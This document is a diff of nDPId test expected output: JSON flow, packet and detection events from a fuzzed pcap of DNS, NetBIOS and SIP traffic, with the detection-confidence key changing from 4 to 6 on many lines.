+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470315341} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470315340,"pkt":"ADBUADRWAODtAW69CABFAAAhau0AUoARGB8NqAEC1PIhIxPEE8QADcBLICAgNiA="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1120470315653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470315653,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlau4AAIARSsjAqAECwKgB\/wCKAIoA0VstEQ6FJ8CoAQIAigC7AAAgRUVEQURBRENERURHREZDtkNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFOEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP9TTUIlNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhBFYAAwABAAAAAgA2AFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoARDAwMjQ2NQAAAAAAAAAAAAUAA2EAAA8BVaoA"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1120470327552,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470327552,"pkt":"ADBUOzRWAODtAW69CABFAABIau8AAIARTGLAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY6qqqqqqqqqqqqqqqqqqqqo="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1120470328547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470328547,"pkt":"ADBUADRWAODtAW69CABFQABIavAAAIARTGHAqAECwKgBAQrUADUANIwPneEBAACQAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470327552,"flow_last_seen":1120470328547,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470328547,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470327552,"flow_last_seen":1120470328547,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470328547,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1120470330550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470330550,"pkt":"ADBUADRWAODtAW69CABFAABIavEAAIARTGDAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAAX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1120470332553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470332553,"pkt":"ADBUADRWAODtAW69CABFAABIavIAAIARTF\/AqAECwLgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470141614,"flow_last_seen":1120470150621,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1120470344560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470344560,"pkt":"ADBUADRWAODtAW69CABFAABEavQAAIARTEHAqAECwKgBAQrVADUAMLAHdOoEAAABAAAAAAAAATEBMAEwAzEyNwdpTC1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470344562} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470344560,"pkt":"AODtAW69ADBUADRWCABFAABbAACGAEARtz7AqAEBwKgBAgA1CtUAR5KDdOKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1120470356585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470356585,"pkt":"ADBUADRWAODtAW69CABFAABIavkAAIARTFjAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXBpY3liZXJjaXR5AmJrAAAhAAE="} 